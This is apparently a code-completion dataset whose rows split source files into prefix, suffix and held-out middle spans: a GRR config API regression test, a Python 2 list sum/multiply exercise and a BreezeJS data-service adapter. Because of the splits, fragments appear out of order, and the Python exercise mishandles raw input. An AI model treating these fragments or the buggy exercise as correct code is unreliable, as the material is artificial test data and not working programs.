handler = config_plugin.ApiListGrrBinariesHandler
def Run(self):
self.SetUpBinaries()
self.Check("ListGrrBinaries")
class ApiGetGrrBinaryHandlerRegressionTest(
config_plugin_test.ApiGrrBinaryTestMixin,
api_regression_test_lib.ApiRegressionTest):
api_method = "GetGrrBinary"
handler = config_plugin.ApiGetGrrBinaryHandler
def Run(self):
self.SetUpBinaries()
self.Check(
"GetGrrBinary",
args=config_plugin.ApiGetGrrBinaryArgs(type="PYTHON_HACK", path="test"))
self.Check(
"GetGrrBinary",
args=config_plugin.ApiGetGrrBinaryArgs(
type="EXECUTABLE", path="windows/test.exe"))
| api_regression_test_lib.ApiRegressionTest):
api_method = "GetGrrBinaryBlob"
handler = config_plugin.ApiGetGrrBinaryBlobHandler
def Run(self):
self.SetUpBinaries()
self.Check(
"GetGrrBinaryBlob",
args=config_plugin.ApiGetGrrBinaryBlobArgs(
type="PYTHON_HACK", path="test"))
self.Check(
"GetGrrBinaryBlob",
args=config_plugin.ApiGetGrrBinaryBlobArgs(
type="EXECUTABLE", path="windows/test.exe"))
def main(argv):
api_regression_test_lib.main(argv)
if __name__ == "__main__":
app.run(main) | class ApiGetGrrBinaryBlobHandlerRegressionTest(
config_plugin_test.ApiGrrBinaryTestMixin, | random_line_split |
config_regression_test.py | #!/usr/bin/env python
"""This modules contains regression tests for config API handler."""
from __future__ import absolute_import
from __future__ import division
from __future__ import unicode_literals
from absl import app
from grr_response_server.gui import api_regression_test_lib
from grr_response_server.gui.api_plugins import config as config_plugin
from grr_response_server.gui.api_plugins import config_test as config_plugin_test
class ApiListGrrBinariesHandlerRegressionTest(
config_plugin_test.ApiGrrBinaryTestMixin,
api_regression_test_lib.ApiRegressionTest):
api_method = "ListGrrBinaries"
handler = config_plugin.ApiListGrrBinariesHandler
def Run(self):
self.SetUpBinaries()
self.Check("ListGrrBinaries")
class ApiGetGrrBinaryHandlerRegressionTest(
config_plugin_test.ApiGrrBinaryTestMixin,
api_regression_test_lib.ApiRegressionTest):
api_method = "GetGrrBinary"
handler = config_plugin.ApiGetGrrBinaryHandler
def Run(self):
self.SetUpBinaries()
self.Check(
"GetGrrBinary",
args=config_plugin.ApiGetGrrBinaryArgs(type="PYTHON_HACK", path="test"))
self.Check(
"GetGrrBinary",
args=config_plugin.ApiGetGrrBinaryArgs(
type="EXECUTABLE", path="windows/test.exe"))
class ApiGetGrrBinaryBlobHandlerRegressionTest(
config_plugin_test.ApiGrrBinaryTestMixin,
api_regression_test_lib.ApiRegressionTest):
api_method = "GetGrrBinaryBlob"
handler = config_plugin.ApiGetGrrBinaryBlobHandler
def Run(self):
self.SetUpBinaries()
self.Check(
"GetGrrBinaryBlob",
args=config_plugin.ApiGetGrrBinaryBlobArgs(
type="PYTHON_HACK", path="test"))
self.Check(
"GetGrrBinaryBlob",
args=config_plugin.ApiGetGrrBinaryBlobArgs(
type="EXECUTABLE", path="windows/test.exe"))
def main(argv):
api_regression_test_lib.main(argv)
if __name__ == "__main__":
| app.run(main) | conditional_block |
|
operate_list.py | # Define a function sum() and a function multiply()
# that sums and multiplies (respectively) all the numbers in a list of numbers.
# For example, sum([1, 2, 3, 4]) should return 10,
# and multiply([1, 2, 3, 4]) should return 24.
def check_list(num_list):
"""Check if input is list"""
if num_list is None:
return False
if len(num_list) == 0:
return False
new_list = []
for i in num_list:
if i!='[' and i!=']' and i!=',':
new_list.append(i)
for x in new_list:
if type(x) != int:
return False
return True
def sum(num_list):
|
def multiply(num_list):
"""Multiply list values"""
if check_list(num_list):
final_sum = 1
for i in num_list:
final_sum = final_sum * i
return final_sum
else:
return False
def main():
get_list = input("Enter list: ")
operations = [sum, multiply]
print map(lambda x: x(get_list), operations)
if __name__ == "__main__":
main()
| """Compute sum of list values"""
if check_list(num_list):
final_sum = 0
for i in num_list:
final_sum = final_sum + i
return final_sum
else:
return False | identifier_body |
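# An alternative Python 3 sketch of the same two operations using
# functools.reduce; on valid lists of ints it matches the functions above.
from functools import reduce
import operator

def sum_list(nums):
    return reduce(operator.add, nums, 0)

def multiply_list(nums):
    return reduce(operator.mul, nums, 1)

assert sum_list([1, 2, 3, 4]) == 10
assert multiply_list([1, 2, 3, 4]) == 24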
operate_list.py | # Define a function sum() and a function multiply()
# that sums and multiplies (respectively) all the numbers in a list of numbers.
# For example, sum([1, 2, 3, 4]) should return 10,
# and multiply([1, 2, 3, 4]) should return 24.
def check_list(num_list):
"""Check if input is list"""
if num_list is None:
return False
if len(num_list) == 0:
return False
new_list = []
for i in num_list:
if i!='[' and i!=']' and i!=',':
new_list.append(i)
for x in new_list:
if type(x) != int:
return False
return True
def | (num_list):
"""Compute sum of list values"""
if check_list(num_list):
final_sum = 0
for i in num_list:
final_sum = final_sum + i
return final_sum
else:
return False
def multiply(num_list):
"""Multiply list values"""
if check_list(num_list):
final_sum = 1
for i in num_list:
final_sum = final_sum * i
return final_sum
else:
return False
def main():
get_list = input("Enter list: ")
operations = [sum, multiply]
print map(lambda x: x(get_list), operations)
if __name__ == "__main__":
main()
| sum | identifier_name |
operate_list.py | # Define a function sum() and a function multiply()
# that sums and multiplies (respectively) all the numbers in a list of numbers.
# For example, sum([1, 2, 3, 4]) should return 10,
# and multiply([1, 2, 3, 4]) should return 24.
def check_list(num_list):
"""Check if input is list"""
if num_list is None:
return False
if len(num_list) == 0:
return False
new_list = []
for i in num_list:
if i!='[' and i!=']' and i!=',':
new_list.append(i)
for x in new_list:
if type(x) != int:
return False
return True
def sum(num_list):
"""Compute sum of list values"""
if check_list(num_list):
final_sum = 0
for i in num_list:
final_sum = final_sum + i
return final_sum
else:
return False
def multiply(num_list):
"""Multiply list values"""
| for i in num_list:
final_sum = final_sum * i
return final_sum
else:
return False
def main():
get_list = input("Enter list: ")
operations = [sum, multiply]
print map(lambda x: x(get_list), operations)
if __name__ == "__main__":
main() | if check_list(num_list):
final_sum = 1
| random_line_split |
operate_list.py | # Define a function sum() and a function multiply()
# that sums and multiplies (respectively) all the numbers in a list of numbers.
# For example, sum([1, 2, 3, 4]) should return 10,
# and multiply([1, 2, 3, 4]) should return 24.
def check_list(num_list):
"""Check if input is list"""
if num_list is None:
return False
if len(num_list) == 0:
|
new_list = []
for i in num_list:
if i!='[' and i!=']' and i!=',':
new_list.append(i)
for x in new_list:
if type(x) != int:
return False
return True
def sum(num_list):
"""Compute sum of list values"""
if check_list(num_list):
final_sum = 0
for i in num_list:
final_sum = final_sum + i
return final_sum
else:
return False
def multiply(num_list):
"""Multiply list values"""
if check_list(num_list):
final_sum = 1
for i in num_list:
final_sum = final_sum * i
return final_sum
else:
return False
def main():
get_list = input("Enter list: ")
operations = [sum, multiply]
print map(lambda x: x(get_list), operations)
if __name__ == "__main__":
main()
| return False | conditional_block |
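# Quick sanity checks for the behavior promised in the header comment above,
# assuming the module's sum(), multiply() and check_list() are in scope (note
# that this sum() shadows the builtin of the same name).
assert sum([1, 2, 3, 4]) == 10
assert multiply([1, 2, 3, 4]) == 24
assert multiply([]) is False   # empty input is rejected by check_list()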
abstract-data-service-adapter.ts | ?: any;
/** The name of this adapter. */
name: string;
/** The [[IAjaxAdapter]] used by this [[IDataServiceAdapter]]. */
ajaxImpl: IAjaxAdapter;
co | {
}
// TODO use interface
checkForRecomposition(interfaceInitializedArgs: any) {
if (interfaceInitializedArgs.interfaceName === "ajax" && interfaceInitializedArgs.isDefault) {
this.initialize();
}
}
initialize() {
this.ajaxImpl = config.getAdapterInstance<IAjaxAdapter>("ajax") !;
// don't cache 'ajax' because then we would need to ".bind" it, and don't want to because of browser support issues.
if (this.ajaxImpl && this.ajaxImpl.ajax) {
return;
}
throw new Error("Unable to find ajax adapter for dataservice adapter '" + (this.name || '') + "'.");
}
fetchMetadata(metadataStore: MetadataStore, dataService: DataService) {
let serviceName = dataService.serviceName;
let url = dataService.qualifyUrl("Metadata");
let promise = new Promise((resolve, reject) => {
this.ajaxImpl.ajax({
type: "GET",
url: url,
dataType: 'json',
success: (httpResponse: IHttpResponse) => {
// might have been fetched by another query
if (metadataStore.hasMetadataFor(serviceName)) {
return resolve("already fetched");
}
let data = httpResponse.data;
let metadata: any;
try {
metadata = typeof (data) === "string" ? JSON.parse(data) : data;
metadataStore.importMetadata(metadata);
} catch (e) {
let errMsg = "Unable to either parse or import metadata: " + e.message;
handleHttpError(reject, httpResponse, "Metadata query failed for: " + url + ". " + errMsg);
}
// import may have brought in the service.
if (!metadataStore.hasMetadataFor(serviceName)) {
metadataStore.addDataService(dataService);
}
resolve(metadata);
},
error: (httpResponse: IHttpResponse) => {
handleHttpError(reject, httpResponse, "Metadata query failed for: " + url);
}
});
});
return promise;
}
executeQuery(mappingContext: MappingContext) {
mappingContext.adapter = this;
let promise = new Promise<IQueryResult>((resolve, reject) => {
let url = mappingContext.getUrl();
let params = {
type: "GET",
url: url,
params: (mappingContext.query as EntityQuery).parameters,
dataType: 'json',
success: function (httpResponse: IHttpResponse) {
let data = httpResponse.data;
try {
let rData: IQueryResult;
let results = data && (data.results || data.Results);
if (results) {
rData = { results: results, inlineCount: data.inlineCount || data.InlineCount,
httpResponse: httpResponse, query: mappingContext.query };
} else {
rData = { results: data, httpResponse: httpResponse, query: mappingContext.query };
}
resolve(rData);
} catch (e) {
if (e instanceof Error) {
reject(e);
} else {
handleHttpError(reject, httpResponse);
}
}
},
error: function (httpResponse: IHttpResponse) {
handleHttpError(reject, httpResponse);
},
crossDomain: false
};
if (mappingContext.dataService.useJsonp) {
params.dataType = 'jsonp';
params.crossDomain = true;
}
this.ajaxImpl.ajax(params);
});
return promise;
}
saveChanges(saveContext: ISaveContext, saveBundle: ISaveBundle) {
let adapter = saveContext.adapter = this;
let saveBundleSer = adapter._prepareSaveBundle(saveContext, saveBundle);
let bundle = JSON.stringify(saveBundleSer);
let url = saveContext.dataService.qualifyUrl(saveContext.resourceName);
let promise = new Promise<ISaveResult>((resolve, reject) => {
this.ajaxImpl.ajax({
type: "POST",
url: url,
dataType: 'json',
contentType: "application/json",
data: bundle,
success: function (httpResponse: IHttpResponse) {
httpResponse.saveContext = saveContext;
let data = httpResponse.data;
if (data.Errors || data.errors) {
handleHttpError(reject, httpResponse);
} else {
let saveResult = adapter._prepareSaveResult(saveContext, data);
saveResult.httpResponse = httpResponse;
resolve(saveResult);
}
},
error: function (httpResponse: IHttpResponse) {
httpResponse.saveContext = saveContext;
handleHttpError(reject, httpResponse);
}
});
});
return promise;
}
/** Abstract method that needs to be overwritten in any concrete DataServiceAdapter subclass.
The return value from this method should be a serializable object that will be sent to the server after calling JSON.stringify on it.
*/
_prepareSaveBundle(saveContext: ISaveContext, saveBundle: ISaveBundle): any {
// The implementor should call _createChangeRequestInterceptor
throw new Error("Need a concrete implementation of _prepareSaveBundle");
}
/**
Returns a constructor function for a "ChangeRequestInterceptor"
that can tweak the saveBundle both as it is built and when it is completed
by a concrete DataServiceAdapter.
Initialized with a default, no-op implementation that developers can replace with a
substantive implementation that changes the individual entity change requests
or aspects of the entire 'saveBundle' without having to write their own DataService adapters.
> let adapter = breeze.config.getAdapterInstance('dataService');
> adapter.changeRequestInterceptor = function (saveContext, saveBundle) {
> this.getRequest = function (request, entity, index) {
> // alter the request that the adapter prepared for this entity
> // based on the entity, saveContext, and saveBundle
> // e.g., add a custom header or prune the originalValuesMap
> return request;
> };
> this.done = function (requests) {
> // alter the array of requests representing the entire change-set
> // based on the saveContext and saveBundle
> };
> }
@param saveContext - The BreezeJS "context" for the save operation.
@param saveBundle - Contains the array of entities-to-be-saved (AKA, the entity change-set).
@return Constructor for a "ChangeRequestInterceptor".
**/
changeRequestInterceptor: IChangeRequestInterceptorCtor = DefaultChangeRequestInterceptor;
/** @hidden @internal */
_createChangeRequestInterceptor(saveContext: ISaveContext, saveBundle: ISaveBundle) {
let adapter = saveContext.adapter!;
let cri = adapter.changeRequestInterceptor;
let isFn = core.isFunction;
if (isFn(cri)) {
let pre = adapter.name + " DataServiceAdapter's ChangeRequestInterceptor";
let post = " is missing or not a function.";
let interceptor = new cri(saveContext, saveBundle);
if (!isFn(interceptor.getRequest)) {
throw new Error(pre + '.getRequest' + post);
}
if (!isFn(interceptor.done)) {
throw new Error(pre + '.done' + post);
}
return interceptor;
} else {
return new DefaultChangeRequestInterceptor(saveContext, saveBundle) as IChangeRequestInterceptor;
}
}
/** Abstract method that needs to be overwritten in any concrete DataServiceAdapter subclass.
This method needs to take the result returned by the server and convert it into an ISaveResult.
*/
_prepareSaveResult(saveContext: ISaveContext, data: any): ISaveResult {
throw new Error("Need a concrete implementation of _prepareSaveResult");
}
/** Utility method that may be used in any concrete DataServiceAdapter subclass to handle any
http connection issues.
*/
// Put this at the bottom of your http error analysis
static _catchNoConnectionError(err: IServerError) {
if (err.status === 0 && err.message == null) {
err.message = "HTTP response status 0 and no message. " +
"Likely did not or could not reach server. Is the server running?";
}
}
jsonResultsAdapter = new JsonResultsAdapter({
name: "noop",
visitNode: function (/* node, mappingContext, nodeContext */) {
return {};
}
});
}
function handleHttpError(reject: (reason?: any) => void, httpResponse: IHttpResponse, messagePrefix?: string) {
let err = createError(httpResponse);
AbstractDataServiceAdapter._catchNoConnectionError(err);
if (messagePrefix) {
err.message = messagePrefix + "; " + err.message;
}
reject(err);
}
function createError(httpResponse: IHttpResponse) {
let err = new Error() as IServerError;
err.httpResponse = httpResponse;
err.status = httpResponse.status;
let errObj = httpResponse.data;
if (!errObj) {
err.message = httpResponse.error && httpResponse.error.toString();
return err;
}
// some ajax providers will convert errant result into an object ( angular), others will not (jQuery)
// if not do it here.
if (typeof errObj === "string") {
try {
errObj = JSON.parse(errObj);
} catch (e) {
| nstructor() | identifier_name |
abstract-data-service-adapter.ts | impl?: any;
/** The name of this adapter. */
name: string;
/** The [[IAjaxAdapter]] used by this [[IDataServiceAdapter]]. */
ajaxImpl: IAjaxAdapter;
constructor() {
}
// TODO use interface
checkForRecomposition(interfaceInitializedArgs: any) {
if (interfaceInitializedArgs.interfaceName === "ajax" && interfaceInitializedArgs.isDefault) {
this.initialize();
}
}
initialize() {
this.ajaxImpl = config.getAdapterInstance<IAjaxAdapter>("ajax") !;
// don't cache 'ajax' because then we would need to ".bind" it, and don't want to because of browser support issues.
if (this.ajaxImpl && this.ajaxImpl.ajax) {
return;
}
throw new Error("Unable to find ajax adapter for dataservice adapter '" + (this.name || '') + "'.");
}
fetchMetadata(metadataStore: MetadataStore, dataService: DataService) {
let serviceName = dataService.serviceName;
let url = dataService.qualifyUrl("Metadata");
let promise = new Promise((resolve, reject) => {
this.ajaxImpl.ajax({
type: "GET",
url: url,
dataType: 'json',
success: (httpResponse: IHttpResponse) => {
// might have been fetched by another query
if (metadataStore.hasMetadataFor(serviceName)) {
return resolve("already fetched");
}
let data = httpResponse.data;
let metadata: any;
try {
metadata = typeof (data) === "string" ? JSON.parse(data) : data;
metadataStore.importMetadata(metadata);
} catch (e) {
let errMsg = "Unable to either parse or import metadata: " + e.message;
handleHttpError(reject, httpResponse, "Metadata query failed for: " + url + ". " + errMsg);
}
// import may have brought in the service.
if (!metadataStore.hasMetadataFor(serviceName)) {
metadataStore.addDataService(dataService);
}
resolve(metadata);
},
error: (httpResponse: IHttpResponse) => {
handleHttpError(reject, httpResponse, "Metadata query failed for: " + url); | });
return promise;
}
executeQuery(mappingContext: MappingContext) {
mappingContext.adapter = this;
let promise = new Promise<IQueryResult>((resolve, reject) => {
let url = mappingContext.getUrl();
let params = {
type: "GET",
url: url,
params: (mappingContext.query as EntityQuery).parameters,
dataType: 'json',
success: function (httpResponse: IHttpResponse) {
let data = httpResponse.data;
try {
let rData: IQueryResult;
let results = data && (data.results || data.Results);
if (results) {
rData = { results: results, inlineCount: data.inlineCount || data.InlineCount,
httpResponse: httpResponse, query: mappingContext.query };
} else {
rData = { results: data, httpResponse: httpResponse, query: mappingContext.query };
}
resolve(rData);
} catch (e) {
if (e instanceof Error) {
reject(e);
} else {
handleHttpError(reject, httpResponse);
}
}
},
error: function (httpResponse: IHttpResponse) {
handleHttpError(reject, httpResponse);
},
crossDomain: false
};
if (mappingContext.dataService.useJsonp) {
params.dataType = 'jsonp';
params.crossDomain = true;
}
this.ajaxImpl.ajax(params);
});
return promise;
}
saveChanges(saveContext: ISaveContext, saveBundle: ISaveBundle) {
let adapter = saveContext.adapter = this;
let saveBundleSer = adapter._prepareSaveBundle(saveContext, saveBundle);
let bundle = JSON.stringify(saveBundleSer);
let url = saveContext.dataService.qualifyUrl(saveContext.resourceName);
let promise = new Promise<ISaveResult>((resolve, reject) => {
this.ajaxImpl.ajax({
type: "POST",
url: url,
dataType: 'json',
contentType: "application/json",
data: bundle,
success: function (httpResponse: IHttpResponse) {
httpResponse.saveContext = saveContext;
let data = httpResponse.data;
if (data.Errors || data.errors) {
handleHttpError(reject, httpResponse);
} else {
let saveResult = adapter._prepareSaveResult(saveContext, data);
saveResult.httpResponse = httpResponse;
resolve(saveResult);
}
},
error: function (httpResponse: IHttpResponse) {
httpResponse.saveContext = saveContext;
handleHttpError(reject, httpResponse);
}
});
});
return promise;
}
/** Abstract method that needs to be overwritten in any concrete DataServiceAdapter subclass.
The return value from this method should be a serializable object that will be sent to the server after calling JSON.stringify on it.
*/
_prepareSaveBundle(saveContext: ISaveContext, saveBundle: ISaveBundle): any {
// The implementor should call _createChangeRequestInterceptor
throw new Error("Need a concrete implementation of _prepareSaveBundle");
}
/**
Returns a constructor function for a "ChangeRequestInterceptor"
that can tweak the saveBundle both as it is built and when it is completed
by a concrete DataServiceAdapter.
Initialized with a default, no-op implementation that developers can replace with a
substantive implementation that changes the individual entity change requests
or aspects of the entire 'saveBundle' without having to write their own DataService adapters.
> let adapter = breeze.config.getAdapterInstance('dataService');
> adapter.changeRequestInterceptor = function (saveContext, saveBundle) {
> this.getRequest = function (request, entity, index) {
> // alter the request that the adapter prepared for this entity
> // based on the entity, saveContext, and saveBundle
> // e.g., add a custom header or prune the originalValuesMap
> return request;
> };
> this.done = function (requests) {
> // alter the array of requests representing the entire change-set
> // based on the saveContext and saveBundle
> };
> }
@param saveContext - The BreezeJS "context" for the save operation.
@param saveBundle - Contains the array of entities-to-be-saved (AKA, the entity change-set).
@return Constructor for a "ChangeRequestInterceptor".
**/
changeRequestInterceptor: IChangeRequestInterceptorCtor = DefaultChangeRequestInterceptor;
/** @hidden @internal */
_createChangeRequestInterceptor(saveContext: ISaveContext, saveBundle: ISaveBundle) {
let adapter = saveContext.adapter!;
let cri = adapter.changeRequestInterceptor;
let isFn = core.isFunction;
if (isFn(cri)) {
let pre = adapter.name + " DataServiceAdapter's ChangeRequestInterceptor";
let post = " is missing or not a function.";
let interceptor = new cri(saveContext, saveBundle);
if (!isFn(interceptor.getRequest)) {
throw new Error(pre + '.getRequest' + post);
}
if (!isFn(interceptor.done)) {
throw new Error(pre + '.done' + post);
}
return interceptor;
} else {
return new DefaultChangeRequestInterceptor(saveContext, saveBundle) as IChangeRequestInterceptor;
}
}
/** Abstract method that needs to be overwritten in any concrete DataServiceAdapter subclass.
This method needs to take the result returned by the server and convert it into an ISaveResult.
*/
_prepareSaveResult(saveContext: ISaveContext, data: any): ISaveResult {
throw new Error("Need a concrete implementation of _prepareSaveResult");
}
/** Utility method that may be used in any concrete DataServiceAdapter subclass to handle any
http connection issues.
*/
// Put this at the bottom of your http error analysis
static _catchNoConnectionError(err: IServerError) {
if (err.status === 0 && err.message == null) {
err.message = "HTTP response status 0 and no message. " +
"Likely did not or could not reach server. Is the server running?";
}
}
jsonResultsAdapter = new JsonResultsAdapter({
name: "noop",
visitNode: function (/* node, mappingContext, nodeContext */) {
return {};
}
});
}
function handleHttpError(reject: (reason?: any) => void, httpResponse: IHttpResponse, messagePrefix?: string) {
let err = createError(httpResponse);
AbstractDataServiceAdapter._catchNoConnectionError(err);
if (messagePrefix) {
err.message = messagePrefix + "; " + err.message;
}
reject(err);
}
function createError(httpResponse: IHttpResponse) {
let err = new Error() as IServerError;
err.httpResponse = httpResponse;
err.status = httpResponse.status;
let errObj = httpResponse.data;
if (!errObj) {
err.message = httpResponse.error && httpResponse.error.toString();
return err;
}
// some ajax providers will convert errant result into an object ( angular), others will not (jQuery)
// if not do it here.
if (typeof errObj === "string") {
try {
errObj = JSON.parse(errObj);
} catch (e) {
| }
}); | random_line_split |
abstract-data-service-adapter.ts | (dataService);
}
resolve(metadata);
},
error: (httpResponse: IHttpResponse) => {
handleHttpError(reject, httpResponse, "Metadata query failed for: " + url);
}
});
});
return promise;
}
executeQuery(mappingContext: MappingContext) {
mappingContext.adapter = this;
let promise = new Promise<IQueryResult>((resolve, reject) => {
let url = mappingContext.getUrl();
let params = {
type: "GET",
url: url,
params: (mappingContext.query as EntityQuery).parameters,
dataType: 'json',
success: function (httpResponse: IHttpResponse) {
let data = httpResponse.data;
try {
let rData: IQueryResult;
let results = data && (data.results || data.Results);
if (results) {
rData = { results: results, inlineCount: data.inlineCount || data.InlineCount,
httpResponse: httpResponse, query: mappingContext.query };
} else {
rData = { results: data, httpResponse: httpResponse, query: mappingContext.query };
}
resolve(rData);
} catch (e) {
if (e instanceof Error) {
reject(e);
} else {
handleHttpError(reject, httpResponse);
}
}
},
error: function (httpResponse: IHttpResponse) {
handleHttpError(reject, httpResponse);
},
crossDomain: false
};
if (mappingContext.dataService.useJsonp) {
params.dataType = 'jsonp';
params.crossDomain = true;
}
this.ajaxImpl.ajax(params);
});
return promise;
}
saveChanges(saveContext: ISaveContext, saveBundle: ISaveBundle) {
let adapter = saveContext.adapter = this;
let saveBundleSer = adapter._prepareSaveBundle(saveContext, saveBundle);
let bundle = JSON.stringify(saveBundleSer);
let url = saveContext.dataService.qualifyUrl(saveContext.resourceName);
let promise = new Promise<ISaveResult>((resolve, reject) => {
this.ajaxImpl.ajax({
type: "POST",
url: url,
dataType: 'json',
contentType: "application/json",
data: bundle,
success: function (httpResponse: IHttpResponse) {
httpResponse.saveContext = saveContext;
let data = httpResponse.data;
if (data.Errors || data.errors) {
handleHttpError(reject, httpResponse);
} else {
let saveResult = adapter._prepareSaveResult(saveContext, data);
saveResult.httpResponse = httpResponse;
resolve(saveResult);
}
},
error: function (httpResponse: IHttpResponse) {
httpResponse.saveContext = saveContext;
handleHttpError(reject, httpResponse);
}
});
});
return promise;
}
/** Abstract method that needs to be overwritten in any concrete DataServiceAdapter subclass.
The return value from this method should be a serializable object that will be sent to the server after calling JSON.stringify on it.
*/
_prepareSaveBundle(saveContext: ISaveContext, saveBundle: ISaveBundle): any {
// The implementor should call _createChangeRequestInterceptor
throw new Error("Need a concrete implementation of _prepareSaveBundle");
}
/**
Returns a constructor function for a "ChangeRequestInterceptor"
that can tweak the saveBundle both as it is built and when it is completed
by a concrete DataServiceAdapter.
Initialized with a default, no-op implementation that developers can replace with a
substantive implementation that changes the individual entity change requests
or aspects of the entire 'saveBundle' without having to write their own DataService adapters.
> let adapter = breeze.config.getAdapterInstance('dataService');
> adapter.changeRequestInterceptor = function (saveContext, saveBundle) {
> this.getRequest = function (request, entity, index) {
> // alter the request that the adapter prepared for this entity
> // based on the entity, saveContext, and saveBundle
> // e.g., add a custom header or prune the originalValuesMap
> return request;
> };
> this.done = function (requests) {
> // alter the array of requests representing the entire change-set
> // based on the saveContext and saveBundle
> };
> }
@param saveContext - The BreezeJS "context" for the save operation.
@param saveBundle - Contains the array of entities-to-be-saved (AKA, the entity change-set).
@return Constructor for a "ChangeRequestInterceptor".
**/
changeRequestInterceptor: IChangeRequestInterceptorCtor = DefaultChangeRequestInterceptor;
/** @hidden @internal */
_createChangeRequestInterceptor(saveContext: ISaveContext, saveBundle: ISaveBundle) {
let adapter = saveContext.adapter!;
let cri = adapter.changeRequestInterceptor;
let isFn = core.isFunction;
if (isFn(cri)) {
let pre = adapter.name + " DataServiceAdapter's ChangeRequestInterceptor";
let post = " is missing or not a function.";
let interceptor = new cri(saveContext, saveBundle);
if (!isFn(interceptor.getRequest)) {
throw new Error(pre + '.getRequest' + post);
}
if (!isFn(interceptor.done)) {
throw new Error(pre + '.done' + post);
}
return interceptor;
} else {
return new DefaultChangeRequestInterceptor(saveContext, saveBundle) as IChangeRequestInterceptor;
}
}
/** Abstract method that needs to be overwritten in any concrete DataServiceAdapter subclass.
This method needs to take the result returned by the server and convert it into an ISaveResult.
*/
_prepareSaveResult(saveContext: ISaveContext, data: any): ISaveResult {
throw new Error("Need a concrete implementation of _prepareSaveResult");
}
/** Utility method that may be used in any concrete DataServiceAdapter subclass to handle any
http connection issues.
*/
// Put this at the bottom of your http error analysis
static _catchNoConnectionError(err: IServerError) {
if (err.status === 0 && err.message == null) {
err.message = "HTTP response status 0 and no message. " +
"Likely did not or could not reach server. Is the server running?";
}
}
jsonResultsAdapter = new JsonResultsAdapter({
name: "noop",
visitNode: function (/* node, mappingContext, nodeContext */) {
return {};
}
});
}
function handleHttpError(reject: (reason?: any) => void, httpResponse: IHttpResponse, messagePrefix?: string) {
let err = createError(httpResponse);
AbstractDataServiceAdapter._catchNoConnectionError(err);
if (messagePrefix) {
err.message = messagePrefix + "; " + err.message;
}
reject(err);
}
function createError(httpResponse: IHttpResponse) {
let err = new Error() as IServerError;
err.httpResponse = httpResponse;
err.status = httpResponse.status;
let errObj = httpResponse.data;
if (!errObj) {
err.message = httpResponse.error && httpResponse.error.toString();
return err;
}
// some ajax providers will convert errant result into an object ( angular), others will not (jQuery)
// if not do it here.
if (typeof errObj === "string") {
try {
errObj = JSON.parse(errObj);
} catch (e) {
// sometimes httpResponse.data is just the error message itself
err.message = errObj;
return err;
}
}
let saveContext = httpResponse.saveContext;
// if any of the follow properties exist the source is .NET
let tmp = errObj.Message || errObj.ExceptionMessage || errObj.EntityErrors || errObj.Errors;
let isDotNet = !!tmp;
let message: string, entityErrors: any[];
if (!isDotNet) {
message = errObj.message;
entityErrors = errObj.errors || errObj.entityErrors;
} else {
let tmp = errObj;
do {
// .NET exceptions can provide both ExceptionMessage and Message but ExceptionMethod if it
// exists has a more detailed message.
message = tmp.ExceptionMessage || tmp.Message;
tmp = tmp.InnerException;
} while (tmp);
// .EntityErrors will only occur as a result of an EntityErrorsException being deliberately thrown on the server
entityErrors = errObj.Errors || errObj.EntityErrors;
entityErrors = entityErrors && entityErrors.map(function (e) {
return {
errorName: e.ErrorName,
entityTypeName: MetadataStore.normalizeTypeName(e.EntityTypeName),
keyValues: e.KeyValues,
propertyName: e.PropertyName,
errorMessage: e.ErrorMessage
};
});
}
if (saveContext && entityErrors) {
let propNameFn = saveContext.entityManager.metadataStore.namingConvention.serverPropertyNameToClient;
entityErrors.forEach(function (e) {
e.propertyName = e.propertyName && propNameFn(e.propertyName);
});
(err as ISaveErrorFromServer).entityErrors = entityErrors;
}
err.message = message || "Server side errors encountered - see the entityErrors collection on this object for more detail";
return err;
}
/** This is a default, no-op implementation that developers can replace. */
class DefaultChangeRequestInterceptor {
constructor(saveContext: ISaveContext, saveBundle: ISaveBundle) {
|
}
| identifier_body |
|
abstract-data-service-adapter.ts | ?: any;
/** The name of this adapter. */
name: string;
/** The [[IAjaxAdapter]] used by this [[IDataServiceAdapter]]. */
ajaxImpl: IAjaxAdapter;
constructor() {
}
// TODO use interface
checkForRecomposition(interfaceInitializedArgs: any) {
if (interfaceInitializedArgs.interfaceName === "ajax" && interfaceInitializedArgs.isDefault) {
this.initialize();
}
}
initialize() {
this.ajaxImpl = config.getAdapterInstance<IAjaxAdapter>("ajax") !;
// don't cache 'ajax' because then we would need to ".bind" it, and don't want to because of browser support issues.
if (this.ajaxImpl && this.ajaxImpl.ajax) {
return;
}
throw new Error("Unable to find ajax adapter for dataservice adapter '" + (this.name || '') + "'.");
}
fetchMetadata(metadataStore: MetadataStore, dataService: DataService) {
let serviceName = dataService.serviceName;
let url = dataService.qualifyUrl("Metadata");
let promise = new Promise((resolve, reject) => {
this.ajaxImpl.ajax({
type: "GET",
url: url,
dataType: 'json',
success: (httpResponse: IHttpResponse) => {
// might have been fetched by another query
if (metadataStore.hasMetadataFor(serviceName)) {
return resolve("already fetched");
}
let data = httpResponse.data;
let metadata: any;
try {
metadata = typeof (data) === "string" ? JSON.parse(data) : data;
metadataStore.importMetadata(metadata);
} catch (e) {
let errMsg = "Unable to either parse or import metadata: " + e.message;
handleHttpError(reject, httpResponse, "Metadata query failed for: " + url + ". " + errMsg);
}
// import may have brought in the service.
if (!metadataStore.hasMetadataFor(serviceName)) {
metadataStore.addDataService(dataService);
}
resolve(metadata);
},
error: (httpResponse: IHttpResponse) => {
handleHttpError(reject, httpResponse, "Metadata query failed for: " + url);
}
});
});
return promise;
}
executeQuery(mappingContext: MappingContext) {
mappingContext.adapter = this;
let promise = new Promise<IQueryResult>((resolve, reject) => {
let url = mappingContext.getUrl();
let params = {
type: "GET",
url: url,
params: (mappingContext.query as EntityQuery).parameters,
dataType: 'json',
success: function (httpResponse: IHttpResponse) {
let data = httpResponse.data;
try {
let rData: IQueryResult;
let results = data && (data.results || data.Results);
if (results) {
rData = { results: results, inlineCount: data.inlineCount || data.InlineCount,
httpResponse: httpResponse, query: mappingContext.query };
} else {
rData = { results: data, httpResponse: httpResponse, query: mappingContext.query };
}
resolve(rData);
} catch (e) {
if (e instanceof Error) {
reject(e);
} else {
handleHttpError(reject, httpResponse);
}
}
},
error: function (httpResponse: IHttpResponse) {
handleHttpError(reject, httpResponse);
},
crossDomain: false
};
if (mappingContext.dataService.useJsonp) {
params.dataType = 'jsonp';
params.crossDomain = true;
}
this.ajaxImpl.ajax(params);
});
return promise;
}
saveChanges(saveContext: ISaveContext, saveBundle: ISaveBundle) {
let adapter = saveContext.adapter = this;
let saveBundleSer = adapter._prepareSaveBundle(saveContext, saveBundle);
let bundle = JSON.stringify(saveBundleSer);
let url = saveContext.dataService.qualifyUrl(saveContext.resourceName);
